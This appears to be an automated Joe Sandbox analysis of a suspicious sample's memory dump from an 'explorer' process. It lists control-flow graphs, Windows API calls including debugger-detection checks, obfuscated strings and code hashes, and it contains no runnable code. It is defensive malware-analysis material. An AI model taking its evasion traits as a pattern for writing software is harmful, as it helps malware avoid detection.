                                                                                                                                                      control_flow_graph 5621 8d4594-8d459d 5622 8d45cc-8d45cd 5621->5622 5623 8d459f-8d45b2 RtlFreeHeap 5621->5623 5623->5622 5624 8d45b4-8d45cb GetLastError call 8cbc0f call 8cbbc6 5623->5624 5624->5622
                                                                                                                                                      APIs
                                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,008D76D8,?,00000000,?,?,008D75F4,?,00000007,?,?,008D7D30,?,?), ref: 008D45AA
                                                                                                                                                      • GetLastError.KERNEL32(?,?,008D76D8,?,00000000,?,?,008D75F4,?,00000007,?,?,008D7D30,?,?), ref: 008D45B5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                                      • Opcode ID: 5fb0fea837ada8a507cd63a04380c71e2f6a38d5ef4cb7e10b89ad3e15729631
                                                                                                                                                      • Instruction ID: 630d1e8408a5c3b1fd873c6f9095d8ab9ae78c982b281c0f24e74888d9e9a52f
                                                                                                                                                      • Opcode Fuzzy Hash: 5fb0fea837ada8a507cd63a04380c71e2f6a38d5ef4cb7e10b89ad3e15729631
                                                                                                                                                      • Instruction Fuzzy Hash: 0FE04632A00604ABCB123FA4FD09B9A3F68FB403A5F105125F608DA161EA718941CF90
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 5629 8a68bc-8a68cd 5630 8a68d3-8a68eb 5629->5630 5631 8a6a00-8a6a02 5629->5631 5632 8a6a03-8a6a0c 5630->5632 5633 8a68f1-8a6903 call 8ceec0 5630->5633 5631->5632 5633->5632 5636 8a6909-8a690e 5633->5636 5637 8a6929-8a693b call 8a6e11 5636->5637 5638 8a6910-8a6922 call 8ce5b4 5636->5638 5637->5632 5643 8a6941-8a6947 5637->5643 5638->5637 5644 8a6a0d-8a6aac call 8a515b 5643->5644 5645 8a694d-8a6970 call 8a22d8 5643->5645 5650 8a6ccb-8a6cd0 5644->5650 5651 8a6ab2-8a6ab7 5644->5651 5645->5650 5652 8a6976-8a6987 call 8a2d4c 5645->5652 5650->5632 5653 8a6cd6-8a6ce6 call 8ce5b4 5650->5653 5651->5650 5654 8a6abd-8a6ac8 5651->5654 5652->5650 5661 8a698d-8a69f6 5652->5661 5653->5632 5654->5650 5657 8a6ace-8a6aea call 8a5174 5654->5657 5657->5650 5664 8a6af0-8a6b3d call 8cd455 call 8a50e4 5657->5664 5663 8a69fc-8a69fe 5661->5663 5663->5632 5668 8a6b42-8a6b56 5664->5668 5669 8a6b58-8a6b5a 5668->5669 5670 8a6b5c 5668->5670 5671 8a6b60-8a6bed call 8a520a call 8a526e 5669->5671 5670->5671 5671->5650 5677 8a6bf3-8a6c27 5671->5677 5677->5650 5679 8a6c2d-8a6c5f 5677->5679 5679->5650 5681 8a6c61-8a6c78 5679->5681 5681->5663 5682 8a6c7e-8a6cc6 call 89dd2a call 89dd94 5681->5682 5682->5632
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4218353326-0
                                                                                                                                                      • Opcode ID: f1283c71e887eaf81ebd0fe75a63c3aeecff2052b893f4fceff83a0d63054a3b
                                                                                                                                                      • Instruction ID: 02d0aa914c3d395ce483c357f8a81e5b83f0236d8aaa8f3e7357e1622894f273
                                                                                                                                                      • Opcode Fuzzy Hash: f1283c71e887eaf81ebd0fe75a63c3aeecff2052b893f4fceff83a0d63054a3b
                                                                                                                                                      • Instruction Fuzzy Hash: B8C1E7B1904B409FE724CF29C880A6BB7E5FF89314F14892DE5AAC3790E774E944CB56
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 5687 8d9d02-8d9d1b call 8d776c 5690 8d9d1d-8d9d36 call 8d9383 5687->5690 5691 8d9d37-8d9d74 call 8d4677 call 8d988b call 8d9915 call 8d98e9 5687->5691 5703 8d9d7a-8d9d86 call 8d9891 5691->5703 5704 8d9e93-8d9e9d call 8d4677 5691->5704 5703->5704 5709 8d9d8c-8d9d98 call 8d98bd 5703->5709 5709->5704 5712 8d9d9e-8d9dbf call 8d4594 GetTimeZoneInformation 5709->5712 5715 8d9dc5-8d9de5 5712->5715 5716 8d9e70-8d9e92 call 8d9885 call 8d9879 call 8d987f 5712->5716 5717 8d9def-8d9df7 5715->5717 5718 8d9de7-8d9dec 5715->5718 5720 8d9e09-8d9e0b 5717->5720 5721 8d9df9-8d9e00 5717->5721 5718->5717 5724 8d9e0d-8d9e6d call 8c3ea0 * 4 call 8d744f call 8d9d02 * 2 5720->5724 5721->5720 5723 8d9e02-8d9e07 5721->5723 5723->5724 5724->5716
                                                                                                                                                      APIs
                                                                                                                                                      • GetTimeZoneInformation.KERNELBASE(00000000,00000000,00000000,008DA1D8,008A5109,?), ref: 008D9DB6
                                                                                                                                                        • Part of subcall function 008D9383: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,008DD3BE,?,00000000,-00000008), ref: 008D942F
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ByteCharInformationMultiTimeWideZone
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1123094072-0
                                                                                                                                                      • Opcode ID: 3fd1d8581f1c64a231c3f3d9014bd166484f9bc5329be23291a436d5e02dab67
                                                                                                                                                      • Instruction ID: b9bbc6c20b89548104f3ef25111c571619ce540ef4ae50d82169ae80c19c0836
                                                                                                                                                      • Opcode Fuzzy Hash: 3fd1d8581f1c64a231c3f3d9014bd166484f9bc5329be23291a436d5e02dab67
                                                                                                                                                      • Instruction Fuzzy Hash: 3041B071900214BFDB10AFA9DC02E6A7FA9FF01760F108266F948E73A2E7719D109B91
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 5790 8dc6e8-8dc6f3 5791 8dc6f5-8dc6fe call 8d4edf 5790->5791 5792 8dc700-8dc706 5790->5792 5800 8dc724-8dc726 5791->5800 5794 8dc708-8dc70f call 8d4594 5792->5794 5795 8dc711-8dc714 5792->5795 5807 8dc721 5794->5807 5798 8dc73b-8dc74d RtlReAllocateHeap 5795->5798 5799 8dc716-8dc71b call 8cbbc6 5795->5799 5801 8dc74f 5798->5801 5802 8dc727-8dc72e call 8cd41f 5798->5802 5799->5807 5806 8dc723 5801->5806 5802->5799 5810 8dc730-8dc739 call 8d48d0 5802->5810 5806->5800 5807->5806 5810->5798 5810->5799
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 008D4EDF: RtlAllocateHeap.NTDLL(00000000,0089BD04,008ECE74), ref: 008D4F11
                                                                                                                                                      • RtlReAllocateHeap.NTDLL(00000000,?,00894DA9), ref: 008DC745
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      • Opcode ID: 345e68efbaddac7b18a749663ac789d358a6b9a4077ba09bd0dcf340a596f142
                                                                                                                                                      • Instruction ID: 8e23e9c777adc8936d7b37130f1e8c1b276ccdeff286bd3f3e0664e277fd0704
                                                                                                                                                      • Opcode Fuzzy Hash: 345e68efbaddac7b18a749663ac789d358a6b9a4077ba09bd0dcf340a596f142
                                                                                                                                                      • Instruction Fuzzy Hash: ECF096326411176B8B212A6DAC41F6B67A8FF827F0F255327F814EA391EB30DC01DDA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,0089BD04,008ECE74), ref: 008D4F11
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                                      • Opcode ID: 464d2fe312c8eb233f139b54a895eb2e6b331080971124192e928471ce59c73e
                                                                                                                                                      • Instruction ID: 25e420749024d4e883e781e164dbe2be3d1b7a2c938f5e92a79b1a7297752cee
                                                                                                                                                      • Opcode Fuzzy Hash: 464d2fe312c8eb233f139b54a895eb2e6b331080971124192e928471ce59c73e
                                                                                                                                                      • Instruction Fuzzy Hash: BCE0E5219042916BD62027299C00F5A3B68FF813B4F112333EC06D63E1DF70DC019AA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 03a1950dfdb368bf32c07b3c03b43b41575a5866e49038d0890f62cb3d8ff67d
                                                                                                                                                      • Instruction ID: c0adc5fda5803c23c82044cef67a87cc2d2ff0ea182089dea1fe94637bf3876e
                                                                                                                                                      • Opcode Fuzzy Hash: 03a1950dfdb368bf32c07b3c03b43b41575a5866e49038d0890f62cb3d8ff67d
                                                                                                                                                      • Instruction Fuzzy Hash: 77E0E631D41629678B216E26AC05F563F58FF61B50B098216AD04E7351EA70EC158DE1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                      • Opcode ID: 3d98823dad7f0b977dcf3705bc54510897eafc2df10dd899162edc642469e9e3
                                                                                                                                                      • Instruction ID: f90eb397b9bb615d38f51e8d587b9efceb860f7f5b2e51bdd0a4fff538ec2dda
                                                                                                                                                      • Opcode Fuzzy Hash: 3d98823dad7f0b977dcf3705bc54510897eafc2df10dd899162edc642469e9e3
                                                                                                                                                      • Instruction Fuzzy Hash: 2AE04F90A58A488BEE20266C04893BD2745FF23315FB44A56B04ADE355CB28C8825A57
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • GetVolumeInformationW.KERNELBASE(008E5FF0,00000000,00000000,?,00000000,00000000,00000000,00000000,204B3ED8,?,008AE18F), ref: 008AE822
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: InformationVolume
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2039140958-0
                                                                                                                                                      • Opcode ID: 53c980becff237905a705d4c4b3e735f898ca2ef11ce9f60a57fd886345601ac
                                                                                                                                                      • Instruction ID: a56f4d0180b2d055b8961d6e21940e3a797b82467e5dcb84155b81f1451a5ba8
                                                                                                                                                      • Opcode Fuzzy Hash: 53c980becff237905a705d4c4b3e735f898ca2ef11ce9f60a57fd886345601ac
                                                                                                                                                      • Instruction Fuzzy Hash: D8D002F2A552607FB2609F29AC49CB37EDCEE456603150564BC89C6204E5215D9186F2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcat
                                                                                                                                                      • String ID: -"^'$@iN$Default$aK6$aK6$r`^W$s`^W$s`^W
                                                                                                                                                      • API String ID: 4038537762-3820544866
                                                                                                                                                      • Opcode ID: fa04e29abee7e9a10b501494cdeccde1e1be2a6495c7c6ac6a8e15bd9db58aea
                                                                                                                                                      • Instruction ID: f7de352ac9527990fdeb142363c1c7b9b3a5fd7bff4e63c98bbe612d96524388
                                                                                                                                                      • Opcode Fuzzy Hash: fa04e29abee7e9a10b501494cdeccde1e1be2a6495c7c6ac6a8e15bd9db58aea
                                                                                                                                                      • Instruction Fuzzy Hash: D0829170D00659CFDF29EF98DC85AAEBBB0FB54314F28192AE515FB390D7318A418B42
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID: "; f$\f{$ame=$ilen$pA
                                                                                                                                                      • API String ID: 4218353326-1851456184
                                                                                                                                                      • Opcode ID: 975c5c8d29637072d8455104547c0b0229486474a4523c092e2d00ed02df817c
                                                                                                                                                      • Instruction ID: 7cef24c856dea82f75d562b80d3074a87361fe30b9b3f143740d8b5ec3784875
                                                                                                                                                      • Opcode Fuzzy Hash: 975c5c8d29637072d8455104547c0b0229486474a4523c092e2d00ed02df817c
                                                                                                                                                      • Instruction Fuzzy Hash: 9C3281B15083459FEB288F18C89552EBAE0FB96344F24892EF699CBB51E734D944CB07
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID: \8
                                                                                                                                                      • API String ID: 4218353326-3492067470
                                                                                                                                                      • Opcode ID: 29143ea9a899869ffa5a6586b57a09f3073fca7c93e6b9750da2a5301f3a2b94
                                                                                                                                                      • Instruction ID: 5a0cf6d763eefeb8525965ddd959d3fd78f8c39410a5f269c149c08807e7a780
                                                                                                                                                      • Opcode Fuzzy Hash: 29143ea9a899869ffa5a6586b57a09f3073fca7c93e6b9750da2a5301f3a2b94
                                                                                                                                                      • Instruction Fuzzy Hash: 4942B1B1A083459BE7289F18C885A3EB6E0FB96714F54492EF185DBE51E375C890EB03
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: $uhb$%uhb$%uhb$[&T!$\&T!$\&T!$\&T!$vYh$vYh
                                                                                                                                                      • API String ID: 0-2920014731
                                                                                                                                                      • Opcode ID: e0259e4c13444c2b36846dcb8ec876b616d13b0064304453c7ef4f1c26f7aa9c
                                                                                                                                                      • Instruction ID: 534de91ed7290fab9129db7e3ba6ddcf88967b2d02ddf1a51b471358c6159cba
                                                                                                                                                      • Opcode Fuzzy Hash: e0259e4c13444c2b36846dcb8ec876b616d13b0064304453c7ef4f1c26f7aa9c
                                                                                                                                                      • Instruction Fuzzy Hash: 2A9281B1D08609CBEF28CF9CCD856BDBAB0FB26304F64095AE515EBB50D7708941DB62
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: vmz$vmz$vmz$vmz$vmz$vmz
                                                                                                                                                      • API String ID: 0-2631656845
                                                                                                                                                      • Opcode ID: 1afdaaae3841cfea759a3e029d5645fa2e01477f47c6c5e14a5a5b40943efff7
                                                                                                                                                      • Instruction ID: 814cfd6e617f88223a1c428d37f449d9079544bee563000e8d4b46818cfec7de
                                                                                                                                                      • Opcode Fuzzy Hash: 1afdaaae3841cfea759a3e029d5645fa2e01477f47c6c5e14a5a5b40943efff7
                                                                                                                                                      • Instruction Fuzzy Hash: 43D27FB7B893144BD308CE59EC9129AF2D3ABD4624F1F943DE889D3301EE79D9074689
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID: @T>$ @T>$W}6F
                                                                                                                                                      • API String ID: 4218353326-3356682572
                                                                                                                                                      • Opcode ID: f93b3d3a7018bfd3c5619bed916e8cd36f9fad8a5c4c6b68a9bd33883ac0131f
                                                                                                                                                      • Instruction ID: 8bf2d44a232abd80b9c84422be2aa9d337a6742eeff8cf811629619bc788d8f8
                                                                                                                                                      • Opcode Fuzzy Hash: f93b3d3a7018bfd3c5619bed916e8cd36f9fad8a5c4c6b68a9bd33883ac0131f
                                                                                                                                                      • Instruction Fuzzy Hash: D2626EB1508345DFDB259F2CC9846AEBBE0FB95754F204D2EE699CB352E630C8809B13
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • lstrcmpiW.KERNEL32(?,008E4350), ref: 008C0457
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                      • String ID: @y$@y$@y
                                                                                                                                                      • API String ID: 1586166983-2029738505
                                                                                                                                                      • Opcode ID: 65d4b1dd54c618f77c7b3024ec3752433599122a9fa349faf84aa2dbca84b9f8
                                                                                                                                                      • Instruction ID: 4dbef05b371d6db95408846a6638beed5884af73521a9c592477ecf0db8dd372
                                                                                                                                                      • Opcode Fuzzy Hash: 65d4b1dd54c618f77c7b3024ec3752433599122a9fa349faf84aa2dbca84b9f8
                                                                                                                                                      • Instruction Fuzzy Hash: 2BE1F4B1608708DBDB289E688981B2DB7F4FB54794F258A1FE095DB750E235D880AF43
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strrchr
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3213747228-0
                                                                                                                                                      • Opcode ID: 9328256bcef8871b420e9057a9a0bf9e5c86318a1976eafcfd1e5010d7695664
                                                                                                                                                      • Instruction ID: 5544c384e27bacfa0988a142728a08347e1f64cd1175eeed4a954d11de040c64
                                                                                                                                                      • Opcode Fuzzy Hash: 9328256bcef8871b420e9057a9a0bf9e5c86318a1976eafcfd1e5010d7695664
                                                                                                                                                      • Instruction Fuzzy Hash: 5EB11432A04A499FDB158F68C891BEEBBA5FF55354F24836BE801EB341D634DD01CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008D81CE
                                                                                                                                                      • FindNextFileW.KERNEL32(00000000,?), ref: 008D8249
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 008D826B
                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 008D828E
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Find$CloseFile$FirstNext
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1164774033-0
                                                                                                                                                      • Opcode ID: 98cd9e10d12fc7289f893853cecb2a747a5664d48236b19551443c077e4a9876
                                                                                                                                                      • Instruction ID: 0d39455fd2a4309f6726efcc0712a9a585f29290bf24a455207e1bd0b9adf26c
                                                                                                                                                      • Opcode Fuzzy Hash: 98cd9e10d12fc7289f893853cecb2a747a5664d48236b19551443c077e4a9876
                                                                                                                                                      • Instruction Fuzzy Hash: D641D471A00619EFDF20EF69CC89ABAB7B9FF85304F104296E505D7240EF309E858B60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _strlen
                                                                                                                                                      • String ID: 0$8
                                                                                                                                                      • API String ID: 4218353326-46163386
                                                                                                                                                      • Opcode ID: 81a5bca18832ed9320afcd4e6983074b179dbd0a5867f300485f841f4c7624b1
                                                                                                                                                      • Instruction ID: 04c9970208efbee3e159aaa787bea38d3528cbeb80a2f51f7d90c6b0f6c6632e
                                                                                                                                                      • Opcode Fuzzy Hash: 81a5bca18832ed9320afcd4e6983074b179dbd0a5867f300485f841f4c7624b1
                                                                                                                                                      • Instruction Fuzzy Hash: 2F7243716083449FEB14CF18C880A6ABBE2FFCA314F14892DF98987761D7B1D954CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 008C1361
                                                                                                                                                      • IsDebuggerPresent.KERNEL32 ref: 008C142D
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 008C144D
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 008C1457
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 254469556-0
                                                                                                                                                      • Opcode ID: c78b70ac394588005bf3de805f22286560a382f278ecd3e458afd2c95ce61a30
                                                                                                                                                      • Instruction ID: 33ee703b0b5a19286b1787066234e0ee23ce08cac299c7bf73abcf307fad07eb
                                                                                                                                                      • Opcode Fuzzy Hash: c78b70ac394588005bf3de805f22286560a382f278ecd3e458afd2c95ce61a30
                                                                                                                                                      • Instruction Fuzzy Hash: 20311475D052599BDF20DFA4D989BCDBBB8FF08304F1040AAE409AB250EB719A858F45
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: #sQ$#sQ$@y$@y
                                                                                                                                                      • API String ID: 0-498145420
                                                                                                                                                      • Opcode ID: 3a16cafa62f621866b862b2f51a42754290c2344683ec8b872ce3664142f6263
                                                                                                                                                      • Instruction ID: 102580039bb6b6179940fdc86cde94c084fcff6266bb3c57e098590702dfec86
                                                                                                                                                      • Opcode Fuzzy Hash: 3a16cafa62f621866b862b2f51a42754290c2344683ec8b872ce3664142f6263
                                                                                                                                                      • Instruction Fuzzy Hash: 021207B1508305DBDB249F58D8916AEB6E0FB64718F148D2FF285DB3A1F639D9A08703
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      APIs
                                                                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 008D47A3
                                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 008D47AD
                                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(008CDBCF,?,?,?,?,?,00000000), ref: 008D47BA
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000013.00000002.455067690.0000000000891000.00000020.00000001.01000000.00000000.sdmp, Offset: 00891000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_19_2_891000_explorer.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3906539128-0
                                                                                                                                                      • Opcode ID: 5382a0c9c4504c7a57180675044603880a9616bd89decf23ec6024fbbb07042e
                                                                                                                                                      • Instruction ID: 38231219a366031bfcd35ed4b3239caeadd81812adab8730c89189cbed5a56f6
                                                                                                                                                      • Opcode Fuzzy Hash: 5382a0c9c4504c7a57180675044603880a9616bd89decf23ec6024fbbb07042e
                                                                                                                                                      • Instruction Fuzzy Hash: B531B37491122C9BCB21DF68DC89B9DBBB4FF08310F5042EAE51CA6251EB709F828F45
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

